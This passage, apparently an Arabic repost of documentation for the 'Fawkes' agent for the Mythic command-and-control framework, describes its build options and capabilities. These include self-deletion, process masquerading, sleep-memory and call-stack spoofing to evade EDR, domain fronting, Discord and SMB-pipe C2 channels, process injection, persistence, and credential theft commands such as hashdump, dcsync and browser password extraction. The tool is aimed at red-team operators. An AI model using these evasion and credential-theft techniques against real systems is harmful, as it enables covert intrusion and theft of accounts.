  • Windows: يستخدم تقنية إعادة تسمية مجرى NTFS — يعيد تسمية مجرى :$DATA الافتراضي ثم يحذف إدخال الملف. لا يتم إنشاء عملية فرعية.

يتم حذف الثنائي بعد اجتياز فحوصات مفتاح البيئة ولكن قبل بدء نشاط الشبكة.

انتحال العملية (Linux)

قم بتعيين معامل البناء masquerade_name لتغيير اسم عملية الوكيل على Linux. يستخدم prctl(PR_SET_NAME) لتعديل /proc/self/comm، الذي يظهر بواسطة ps و top و htop. بحد أقصى 15 حرفاً.

أسماء مفيدة: [kworker/0:1], [migration/0], sshd, apache2, [rcu_preempt]

بدمج مع الحذف الذاتي، يظهر الوكيل كخيط نواة شرعي أو خدمة بدون ملف على القرص.

صفحات حماية ذاكرة النوم

قم بتمكين sleep_guard_pages (يتطلب sleep_mask=true) لتطبيق VirtualProtect(PAGE_NOACCESS) على ذاكرة الخزانة المشفرة أثناء دورات النوم. بعد أن يقوم قناع النوم بتشفير البيانات الحساسة (AES-256-GCM) وتصفير الأصول، تقوم صفحات الحماية بنقل الخزانة إلى ذاكرة مخصصة VirtualAlloc ووضع علامة عليها NO_ACCESS. ماسحات ذاكرة EDR، ReadProcessMemory، WinDbg، و Process Hacker تحصل على STATUS_ACCESS_VIOLATION عند محاولة قراءة الخزانة. يتم استعادة الصفحات إلى PAGE_READWRITE عند الاستيقاظ قبل فك التشفير. على Linux/macOS، تستخدم صفحات الحماية mmap(MAP_ANON) + mprotect(PROT_NONE) — الاستكشاف يؤدي إلى SIGSEGV.

مفتاح خزانة النوم مربوط بالأجهزة عبر HKDF-SHA256: يتم خلط بذرة عشوائية مع تجزئة SHA-256 لسلسلة العلامة التجارية لوحدة المعالجة المركزية و UUID للجهاز. إذا استخرج شخص ما كتلة الخزانة من تفريغ الذاكرة وحاول فك التشفير على أجهزة مختلفة، فإن اشتقاق المفتاح ينتج مفتاحاً مختلفاً.

انتحال رصة الاستدعاء

قم بتمكين stack_spoof لانتحال رصة استدعاء مؤشر الترابط النائم، مما يهزم أدوات مسح مؤشرات الترابط من EDR (Hunt-Sleeping-Beacons, Moneta, CrowdStrike).

  • Windows (يتطلب indirect_syscalls=true): يقوم مؤشر ترابط أصلي مخصص بتنفيذ NtDelayExecution مع عناوين إرجاع مزيفة تشير إلى kernel32!SleepEx, kernel32!BaseThreadInitThunk, و ntdll!RtlUserThreadStart — سلسلة تهيئة مؤشر الترابط القياسية التي يتوقعها EDR.
  • Linux amd64: يتم إنشاء عملية فرعية عبر clone(CLONE_VM) مع كود آلي خاص بها بطول 291 بايت في ذاكرة mmap'd مجهولة. تستدعي العملية الفرعية nanosleep مباشرة عبر استدعاء نظام خام — لا تظهر عناوين Go runtime أو كود الوكيل على رصة مؤشر الترابط النائم. يتم إعادة تعيين معالجات الإشارة إلى SIG_DFL في العملية الفرعية، ويضمن PR_SET_PDEATHSIG موت العملية الفرعية عند خروج الوالد.
  • macOS arm64: يتم إنشاء مؤشر ترابط أصلي pthread مع كود آلي ARM64 بطول 140 بايت في ذاكرة mmap'd مجهولة. يستخدم مؤشر الترابط __ulock_wait/__ulock_wake للتزامن مع Go runtime ويستدعي nanosleep عبر استدعاء نظام خام — تظهر رصة مؤشر الترابط النائم فقط الكود الآلي المجهول وإطارات النواة، دون أي Go runtime أو كود وكيل.

رؤوس HTTP مخصصة

يتم تطبيق جميع الرؤوس المحددة في تكوين ملف تعريف HTTP C2 الخاص بـ Mythic على كل طلب. بالإضافة إلى User-Agent (مدعوم دائماً)، يمكن للمشغلين إضافة رؤوس مثل Accept-Language, Referer, Cookie, أو X-Forwarded-For لمزج حركة C2 مع أنماط حركة الويب الشرعية.

توجيه المجال (Domain Fronting)

قم بتعيين معامل البناء host_header لتجاوز رأس HTTP Host. هذا يمكن من توجيه المجال: توجيه حركة المرور عبر CDN (مثل CloudFront, Azure CDN) بينما يستهدف رأس Host نطاق C2 الفعلي. بالنسبة لمدافعي الشبكة، تظهر حركة المرور وكأنها تتجه إلى عنوان IP الخاص بـ CDN.

دعم الوكيل

قم بتعيين معامل البناء proxy_url لتوجيه حركة الوكيل عبر وكيل HTTP أو SOCKS. مفيد للعمل في شبكات الشركات التي تحتوي على خوادم وكيل إلزامية.أمثلة: http://proxy.corp.local:8080, socks5://127.0.0.1:1080

الوكلاء الموثوقون: قم بتعيين proxy_user و proxy_pass للمصادقة الأساسية. بالنسبة للوكالات المؤسسية التي تتطلب مصادقة مجال ويندوز، قم أيضًا بتعيين proxy_domain (مثل CORP) لتفعيل مصادقة NTLM. يتم تنفيذ المصافحة الخاصة بـ NTLM (Type1→Type2→Type3) تلقائيًا أثناء إنشاء نفق CONNECT.

كشف الوكيل النظامي (ويندوز): عندما لا يتم تعيين proxy_url، يقوم الوكيل بالاستعلام عن WinHTTP للحصول على إعدادات الوكيل النظامية بما في ذلك الكشف التلقائي PAC/WPAD.

Build Path Stripping (-trimpath)

جميع عمليات البناء تستخدم علامة -trimpath الخاصة بـ Go لإزالة مسارات نظام الملفات المحلية من الملف الثنائي المُجمَّع. بدون ذلك، تتسرب مسارات مثل /home/user/project/... و /go/pkg/mod/... إلى الملف الثنائي عبر تتبعات الذعر والبيانات الوصفية لوقت التشغيل. بالاقتران مع -s -w (إزالة الرموز) و -buildid فارغ، يقلل هذا من المعلومات الجنائية في الملف الثنائي. عمليات بناء Garble تتعامل مع هذا بالفعل؛ -trimpath يغطي عمليات البناء غير Garble.

YARA Post-Build Scanning

بعد التجميع، يتم مسح الحمولة المُبنية تلقائيًا مقابل مجموعة من قواعد YARA التي تصمم أنماط الكشف الشائعة للمدافع. تظهر النتائج في مخرجات بناء Mythic كخطوة إعلامية — المسح لا يفشل البناء أبدًا.

فئات الكشف التي يتم مسحها:

  • تحديد الملفات الثنائية Go وتسرب الرموز
  • مسارات البناء/التطوير المسربة
  • مؤشرات سلاسل إطار Mythic/C2
  • أسماء واجهات برمجة تطبيقات الحقن في ويندوز
  • أسماء واجهات برمجة تطبيقات الوصول إلى بيانات الاعتماد
  • أنماط واجهات برمجة تطبيقات التهرب من الدفاع
  • سلاسل آليات الاستمرارية
  • تكوين C2 بالنص العادي

يساعد هذا المشغلين على فهم مخاطر الكشف واختيار خيارات opsec المناسبة (garble, obfuscate_strings، إلخ) قبل النشر.

Supported C2 Profiles

HTTP Profile

يقوم ملف تعريف HTTP بالاتصال مرة أخرى بخادم Mythic عبر ملف التعريف الأساسي غير الديناميكي. هذا هو ملف تعريف الخروج الافتراضي — يقوم الوكيل بالاستعلام عن Mythic للحصول على المهام عبر HTTP/HTTPS.

Malleable features:

  • عشوائية URI: يدعم كل من get_uri و post_uri رموزًا مميزة يتم حلها لكل طلب:
    • {rand:N} — N حرفًا عشوائيًا سداسيًا (مثل /api/{rand:8} → /api/a3f82b1c)
    • {int:M-N} — عدد صحيح عشوائي في نطاق (مثل /v{int:1-3}/status → /v2/status)
  • تدوير نوع المحتوى: قم بتعيين معلمة البناء content_types إلى قائمة مفصولة بفواصل (مثل application/json,text/plain,application/x-www-form-urlencoded). يقوم الوكيل بالتدوير بينها بطريقة round-robin. الافتراضي: application/x-www-form-urlencoded.
  • تدوير User-Agent: قم بتعيين معلمة البناء user_agent_pool إلى قائمة مفصولة بأسطر جديدة من سلاسل User-Agent. يقوم الوكيل بالتدوير بينها لكل طلب، مما يلغي البصمة الثابتة لـ UA. الافتراضي: UA واحد لـ Chrome 134.

TCP P2P Profile

يتيح ملف تعريف TCP ربط الوكيل من نظير إلى نظير (P2P) للتنقل الداخلي. يستمع وكيل فرعي على منفذ TCP أو أنبوب مسمى في ويندوز وينتظر حتى يتصل وكيل رئيسي عبر أمر link. يتم توجيه جميع المهام والاستجابات عبر قناة الخروج للوكيل الرئيسي (HTTP)، لذا لا يتصل الوكيل الفرعي بـ Mythic مباشرة.

الهندسة المعمارية:``` Mythic Server ←──HTTP──→ Egress Agent (HTTP profile) │ ├──TCP──→ Child Agent A (TCP profile, port 7777) ├──TCP──→ Child Agent B (TCP profile, port 8888) └──SMB──→ Child Agent C (named pipe, \host\pipe\msrpc-f9a1)

root@kitploit:~
**معاملات البناء:**

| المعامل | الوصف | القيمة الافتراضية |
|---------|-------|-------------------|
| `tcp_bind_address` | العنوان والمنفذ الذي يستمع عليه الطفل (مثل `0.0.0.0:7777`) | _(فارغ = وضع HTTP)_ |
| `namedpipe_bind_name` | اسم الأنبوب المسمى الذي يستمع عليه الطفل (مثل `msrpc-f9a1`). ويندوز فقط. | _(فارغ)_ |

عند تعيين `tcp_bind_address` أو `namedpipe_bind_name`، يبدأ الوكيل في وضع مستمع P2P بدلاً من وضع الخروج HTTP.

**سير العمل (TCP):**

1. أنشئ **وكيلاً تابعاً (طفل)** مع ملف تعريف C2 الخاص بـ TCP وقم بتعيين `tcp_bind_address` (مثل `0.0.0.0:7777`)
2. انشر الطفل على مضيف داخلي (لا يتطلب الوصول إلى الإنترنت)
3. من **وكيل الخروج (egress agent)** (ملف تعريف HTTP)، قم بتشغيل: `link -host <child_ip> -port 7777`
4. يقوم Mythic بإنشاء رد اتصال جديد للطفل — تتدفق جميع المهام عبر وكيل الخروج
5. لفصل الاتصال: `unlink -connection_id <uuid>`

**سير العمل (الأنبوب المسمى):**

1. أنشئ **وكيلاً تابعاً (طفل)** مع ملف تعريف C2 الخاص بـ TCP وقم بتعيين `namedpipe_bind_name` (مثل `msrpc-f9a1`)
2. انشر الطفل على مضيف ويندوز داخلي
3. من **وكيل الخروج**، قم بتشغيل: `link -connection_type namedpipe -host <child_ip> -pipe_name msrpc-f9a1`
4. يستخدم الاتصال SMB (المنفذ 445)، مما يندمج مع حركة مشاركة ملفات ويندوز العادية
5. لفصل الاتصال: `unlink -connection_id <uuid>`

**التشفير:** AES-256-CBC مع HMAC-SHA256 (مثل ملف تعريف HTTP). يستخدم بروتوكول السلك تأطيرًا بطول 4 بايت مسبوقًا بطول عبر TCP أو الأنبوب المسمى.

**دعم إعادة الاتصال:** إذا تم فصل الوالد (مثل عبر `unlink` أو موت وكيل الوالد)، يقوم الطفل بتخزين بيانات تسجيل الدخول مؤقتًا وينتظر اتصال والد جديد. عندما يقوم وكيل خروج جديد بتشغيل `link`، يقوم الطفل تلقائيًا بإعادة التسجيل مع Mythic كرد اتصال جديد. لا حاجة إلى تدخل يدوي.

**أطفال متعددون:** يمكن لوكيل الخروج الاتصال بأطفال TCP وأنابيب مسمى متعددة في وقت واحد. يعمل كل طفل بشكل مستقل مع رد اتصال خاص به.

**ملاحظات OPSEC:** تستخدم اتصالات الأنابيب المسمى SMB (المنفذ 445) وتولد مؤشرات على مستوى الشبكة أقل من TCP الخام، ولكن سيتم تسجيل أحداث Sysmon ID 17/18 (PipeEvent) وأحداث ETW من Microsoft-Windows-SMBClient إذا تم تكوينها.

### ملف تعريف Discord C2

يستخدم ملف تعريف Discord روبوت Discord وقناة كنقل سري لـ C2. يتواصل الوكيل مع Mythic عن طريق نشر رسائل مشفرة إلى قناة Discord، حيث يقوم روبوت على جانب الخادم بترحيلها إلى Mythic عبر gRPC push C2.

**الهندسة:**```
Fawkes Agent ──Discord REST API──→ Discord Channel ←──Bot──→ Discord C2 Server ──gRPC──→ Mythic

كيف يعمل:

  1. تسجيل الدخول: يرسل الوكيل رسالة تسجيل دخول مشفرة إلى قناة Discord. يقوم البوت من جانب الخادم بالتقاطها، وإعادة توجيهها إلى Mythic، ثم ينشر الرد مرة أخرى على القناة. يستمر الوكيل في الاستقصاء حتى يجد الرد.
  2. التكليف: يرسل الوكيل طلب get_tasking عبر Discord. مع Push C2، قد يتم دفع المهام بشكل مستقل إلى القناة. يقوم الوكيل بجمع جميع الرسائل المطابقة لكل دورة استقصاء.
  3. الردود: ينشر الوكيل مخرجات المهام على القناة. يتم إرسال الردود الكبيرة (أكثر من 1950 حرفًا) كمرفقات ملفات.

معلمات البناء:

التشفير: AES-256-CBC مع HMAC-SHA256 (نفس نظام ملف تعريف HTTP). يتم تشفير التكوين الحساس (رمز البوت، معرف القناة) في الذاكرة بعد التهيئة باستخدام خزانة AES-256-GCM.

دعم Push C2: يستخدم خادم Discord C2 Push C2 الخاص بـ Mythic (دفق gRPC مستمر). قد تصل المهام بشكل غير متزامن بين دورات الاستقصاء. ينفذ الوكيل:

  • مسح ما قبل الاستقصاء لالتقاط المهام المدفوعة من الدورات السابقة
  • استقصاء استدراكي (3 استقصاءات إضافية بعد أول تطابق) للتوصيل السريع للمهام
  • إعادة محاولة PostResponse عند الفشل العابر

تحديد المعدل: يحترم حدود معدل Discord API مع إعادة محاولة تلقائية وتراجع أسي (حتى 5 محاولات). يتم ترميز User-Agent بشكل ثابت إلى DiscordBot (https://github.com, 1.0) كما هو مطلوب بواسطة Discord API.

متطلبات الإعداد:


Read more

تنزيل الأداة
المصدرالنوعما يوفره
Rubeus.NET assemblyهجمات Kerberos (kerberoasting, تزوير التذاكر, التفويض)
Seatbelt.NET assemblyمسح أمني للمضيف (الصلاحيات, بيانات الاعتماد, الإعدادات)
Certify.NET assemblyتعداد وإساءة استخدام خدمات شهادات Active Directory
SharpHound.NET assemblyجمع بيانات BloodHound
SharpUp.NET assemblyفحوصات تصعيد الصلاحيات المحلية
SharpView.NET assemblyتعداد Active Directory (منفذ PowerView)
nanodumpBOFتفريغ ذاكرة LSASS عبر MiniDumpWriteDump
credmanBOFجمع بيانات Windows Credential Manager
المتغيرالتقنيةالمشغلGo Shellcode
1Worker Factory Start Routine Overwriteإنشاء مؤشر ترابط عامل جديدلا
2TP_WORK Insertionمعالجة قائمة المهامنعم
3TP_WAIT Insertionإشارات الأحداثنعم
4TP_IO Insertionاكتمال الإدخال/الإخراج للملفنعم
5TP_ALPC Insertionرسائل منفذ ALPCنعم
6TP_JOB Insertionتعيين كائن الوظيفةنعم
7TP_DIRECT Insertionمنفذ اكتمال الإدخال/الإخراجنعم
8TP_TIMER Insertionانتهاء المؤقتنعم
الإعدادالتصديراتحالة الاستخدام
standard (افتراضي)Run, Fire, VoidFuncكود شيل sRDI, rundll32, محملات عامة
fullStandard + DllRegisterServer, DllUnregisterServer, ServiceMain, DllGetClassObject, DllCanUnloadNowregsvr32, خدمة svchost, اختطاف COM
التصديرالتنفيذMITRE
DllRegisterServerregsvr32 /s fawkes.dllT1218.010
DllUnregisterServerregsvr32 /u /s fawkes.dllT1218.010
ServiceMainخدمة DLL لـ svchost.exe (Windows فقط)T1543.003
DllGetClassObject + DllCanUnloadNowاختطاف COM InprocServer32T1546.015
inflate_countبايت واحد (مثل 0x90)بايتان (مثل 0x41,0x42)
1,0001 كيلوبايت2 كيلوبايت
10,00010 كيلوبايت20 كيلوبايت
100,000100 كيلوبايت200 كيلوبايت
1,000,0001 ميجابايت2 ميجابايت
3,000,0003 ميجابايت6 ميجابايت
10,000,00010 ميجابايت20 ميجابايت
المعاملالنوعالوصف
pe_presetاخترإعداد مسبق للانتحال السريع (notepad, svchost, cmd, explorer, إلخ.)
pe_companyنصCompanyName (مثل "Microsoft Corporation")
pe_descriptionنصFileDescription — يظهر في إدارة المهام
pe_productنصProductName
pe_versionنصرقم إصدار الملف/المنتج (مثل "10.0.19041.1")
pe_copyrightنصLegalCopyright
pe_original_filenameنصOriginalFilename — يظهر لأدوات التحليل الجنائي
pe_iconملفملف أيقونة مخصص .ico أو .png
pe_manifestاخترمستوى UAC: asInvoker, highestAvailable, requireAdministrator
النوعالأوامر
إنشاء عمليةrun, powershell, spawn, argue
استدعاء APInet-enum, net-user, service, wmi, schtask, procdump, hashdump, eventlog, ntdll-unhook, syscalls, firewall, dcom, vss (create/delete), psexec
قتل عمليةkill
حقن عمليةvanilla-injection, apc-injection, threadless-inject, poolparty-injection, opus-injection, module-stomp, thread-hijack
كتابة ملفupload, cp, mv
إنشاء ملفmkdir
حذف ملفrm
تعديل ملفtimestomp
كتابة سجلreg (write/delete), remote-reg (set/delete), persist (registry, com-hijack, screensaver methods), uac-bypass, defender (add/remove-exclusion)
حفظ سجلreg (save/creds)
سجل عن بعدremote-reg (query/enum/set/delete عبر WinReg RPC)
خدمة عن بعدremote-service (list/query/create/start/stop/delete/modify-path/trigger/dll-sideload عبر SVCCTL RPC)
تسجيل دخولmake-token
سرقة رمزsteal-token, getsystem
الأمرنوع بيانات الاعتمادما يتم الإبلاغ عنه
hashdumphashتجزئات NTLM لـ SAM (Windows)، تجزئات NT/LM/SHA لـ MSV1_0 من مشي LSAPS في الموقع (Windows، insitu-full)، TGTs لـ Kerberos وتذاكر الخدمة بتنسيق .kirbi (Windows، tickets)، تجزئات /etc/shadow (Linux)، تجزئات PBKDF2 (macOS)
kerberoasthashتذاكر TGS للكسر دون اتصال
asrep-roasthashتجزئات AS-REP
dcsynchashمفاتيح NTLM + AES عبر DRSGetNCChanges
lsa-secretsنص عادي/تجزئة/مفتاحكلمات مرور الخدمة، بيانات اعتماد مخزنة مؤقتاً، مفاتيح DPAPI
lapsنص عاديكلمات مرور LAPS v1 و v2
gpp-passwordنص عاديكلمات مرور GPP المشفرة من SYSVOL
browserنص عاديكلمات المرور المحفوظة لـ Chrome/Edge/Firefox (جميع المنصات)، ملفات تعريف الارتباط (جميع المنصات)، السجل، الإكمال التلقائي، الإشارات المرجعية
dpapiنص عادي/تجزئةالأسرار المحمية بـ DPAPI
credmanنص عاديإدخالات Credential Manager (عند إجراء التفريغ)
make-tokenنص عاديبيانات الاعتماد المستخدمة لإنشاء الرمز
cred-harvestتجزئة/نص عادي/رمزالتجزئات الظلية، متغيرات بيئة السحابة، متغيرات البيئة الحساسة، رموز M365 OAuth/JWT، ملفات تعريف الارتباط/التخزين المباشر للمتصفح عبر CDP
credential-promptنص عاديبيانات الاعتماد الملتقطة من الحوار (macOS/Windows/Linux)
البصمةالوصف
chromeChrome/Chromium (افتراضي) — المتصفح الأكثر شيوعاً، الأفضل للاندماج
firefoxFirefox
safariSafari
edgeMicrosoft Edge
rotateيختار عشوائياً Chrome/Firefox/Safari/Edge لكل اتصال (يمنع ارتباط JA3)
randomبصمة عشوائية بالكامل (غير مطابقة للمتصفح)
goلا انتحال — استخدم رصة TLS الافتراضية لـ Go
المعاملالنوعالوصف
env_key_hostnameRegexيجب أن يتطابق اسم المضيف (مثل WORKSTATION-\d+ أو .*\.contoso\.com)
env_key_domainRegexيجب أن يتطابق المجال (مثل CONTOSO أو .*\.local)
env_key_usernameRegexيجب أن يتطابق اسم المستخدم (مثل admin.* أو svc_.*)
env_key_processنصاسم العملية التي يجب أن تكون قيد التشغيل (مثل outlook.exe)
env_key_cpuidRegexيجب أن تتطابق سلسلة العلامة التجارية لوحدة المعالجة المركزية (مثل .*Intel.*i7-12700.* أو .*AMD.*5950X.*). يمنع التنفيذ في البيئات الصندوقية ذات نماذج CPU مختلفة.
env_key_deriveاختيارتشفير تكوين C2 بمفتاح مشتق من خصائص المضيف الهدف. الخيارات: hostname, domain, username, hostname+domain, hostname+domain+username. المضيف الخطأ = فشل فك تشفير AES = خروج صامت. أقوى من مطابقة regex — لا تظهر قيم التكوين مطلقاً في الثنائي.
  • التراجع الأسي: عند فشل متتالي لـ C2، يضاعف الوكيل فترة السكون (محددة بـ 5 دقائق). يتم استعادة الفترة الطبيعية عند الاتصال الناجح.
  • بصمة TLS: تزوير بصمات JA3 للمتصفحات (chrome, firefox, safari, edge, rotate, random).
  • تعدد الإرسال HTTP/2: تفاوض تلقائي لـ h2 عبر HTTPS. تعدد الإرسال للطلبات على اتصال واحد، مطابقًا لسلوك المتصفح. الرجوع الشفاف إلى h1.
  • السرية الأمامية: تدوير مفتاح ECDH X25519 كل N من عمليات تسجيل الوصول (key_rotation_interval). اشتقاق مفاتيح AES-256 جديدة عبر HKDF-SHA256، وإزالة المفاتيح القديمة. يحد من نصف قطر انفجار اختراق المفتاح.
  • حماية إعادة التشغيل: أرقام تسلسل رتيبة في كل رسالة (داخل الغلاف المشفر). يمنع إعادة تشغيل الطلب/الاستجابة الملتقطة.
  • TLS المتبادل (mTLS): مصادقة شهادة العميل تمنع الاعتراض السلبي ووسيط الوكيل (T1573.002).
  • تقديم النطاق: قم بتعيين host_header لتجاوز رأس Host في HTTP.
  • التبديل التلقائي: تكوين fallback_hosts لـ C2 مرن.
  • المعاملالنوعالوصفالقيمة الافتراضية
    discord_tokenStringرمز بوت Discord لمصادقة API(مطلوب)
    bot_channelStringمعرف قناة Discord لتبادل الرسائل(مطلوب)
    callback_intervalStringالثواني بين استعلامات التكليف10
    callback_jitterStringنسبة التشتت (0-100)23
    message_checksStringأقصى عدد محاولات استعلام لكل تبادل20
    time_between_checksStringالثواني بين محاولات الاستعلام5
    AESPSKStringمفتاح تشفير AES-256 مشترك مسبقًا(مولد تلقائيًا)